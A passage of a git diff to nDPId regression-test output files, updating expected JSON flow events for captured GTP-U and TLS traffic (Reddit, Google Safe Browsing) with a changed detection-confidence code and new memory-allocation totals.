-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":82,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":82,"flow_first_seen":1550422828553,"flow_last_seen":1550422844224,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":74496,"flow_avg_l4_payload_len":908,"midstream":0,"thread_ts_msec":1550422844224,"l3_proto":"ip4","src_ip":"145.76.2.236","dst_ip":"187.96.52.85","src_port":2152,"dst_port":2152,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":82,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":82,"flow_first_seen":1550422828553,"flow_last_seen":1550422844224,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":74496,"flow_avg_l4_payload_len":908,"midstream":0,"thread_ts_msec":1550422844224,"l3_proto":"ip4","src_ip":"145.76.2.236","dst_ip":"187.96.52.85","src_port":2152,"dst_port":2152,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}} 00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":82,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","packets-captured":82,"packets-processed":82,"total-skipped-flows":0,"total-l4-payload-len":74496,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":65,"global_ts_msec":1550422844224} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 82/82 @@ -71,9 +71,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871821 bytes -~~ total memory freed........: 5871821 bytes -~~ total allocations/frees...: 118196/118196 +~~ total memory allocated....: 6005455 bytes +~~ total memory freed........: 6005455 bytes +~~ total allocations/frees...: 120958/120958 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 244 chars ~~ json string max len.......: 703 chars diff --git a/test/results/reddit.pcap.out b/test/results/reddit.pcap.out index 39080e9d5..1f97762cb 100644 --- a/test/results/reddit.pcap.out +++ b/test/results/reddit.pcap.out @@ -8,24 +8,24 @@ 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1605291684452,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684452,"pkt":"qtsDr8lk5EKm5WPyht1gCYCjACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3O4Bu5iiLjUAAAAAoAL9IMZSAAACBAWgBAIICql037gAAAAAAQMDBw=="} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1605291684476,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684476,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgKAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbucXOWkwh+EoHfGoBJXgJjYAAACBAV4AQMDAwQCCArC1zJs1N1gBw=="} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1605291684476,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291684476,"pkt":"qtsDr8lk5EKm5WPyht1gBBqZACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnFwBu4Sgd8blpMIggBAB+xzRAAABAQgK1N1gIMLXMmw="} -00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684451,"flow_last_seen":1605291684476,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684476,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684451,"flow_last_seen":1605291684476,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684476,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291684481,"flow_last_seen":1605291684481,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291684481,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1605291684481,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684481,"pkt":"qtsDr8lk5EKm5WPyht1gB3LfACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PABuxF7CxQAAAAAoAL9IHB8AAACBAWgBAIICql039UAAAAAAQMDBw=="} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1605291684485,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684485,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgKAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbucXoJUF9DimtmGoBJXgOayAAACBAV4AQMDAwQCCArC1zJ11N1gBw=="} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1605291684485,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684485,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc7vvL1mKYoi42oBJXgKSSAAACBAV4AQMDAwQCCArC1zJ1qXTfuA=="} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1605291684485,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291684485,"pkt":"qtsDr8lk5EKm5WPyht1gDERGACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnF4Bu+Ka2YaCVBfRgBAB+2qiAAABAQgK1N1gKcLXMnU="} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1605291684485,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291684485,"pkt":"qtsDr8lk5EKm5WPyht1gCYCjACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3O4Bu5iiLjb7y9ZjgBAB+yiDAAABAQgKqXTf2cLXMnU="} -00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684451,"flow_last_seen":1605291684485,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684485,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684452,"flow_last_seen":1605291684486,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684486,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684451,"flow_last_seen":1605291684485,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684485,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684452,"flow_last_seen":1605291684486,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684486,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1605291684551,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684551,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc8HTo0uYRewsVoBJXgNkGAAACBAV4AQMDAwQCCArC1zKKqXTf1Q=="} -01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684451,"flow_last_seen":1605291684551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684451,"flow_last_seen":1605291684551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1605291684551,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291684551,"pkt":"qtsDr8lk5EKm5WPyht1gB3LfACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PABuxF7CxV06NLngBAB+1zSAAABAQgKqXTgG8LXMoo="} -01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684452,"flow_last_seen":1605291684551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01269{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291684452,"flow_last_seen":1605291684551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}} -01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684451,"flow_last_seen":1605291684551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684481,"flow_last_seen":1605291684552,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684552,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684481,"flow_last_seen":1605291684592,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291684592,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01270{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291684481,"flow_last_seen":1605291684593,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291684593,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}} +01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684452,"flow_last_seen":1605291684551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01269{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291684452,"flow_last_seen":1605291684551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}} +01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684451,"flow_last_seen":1605291684551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": 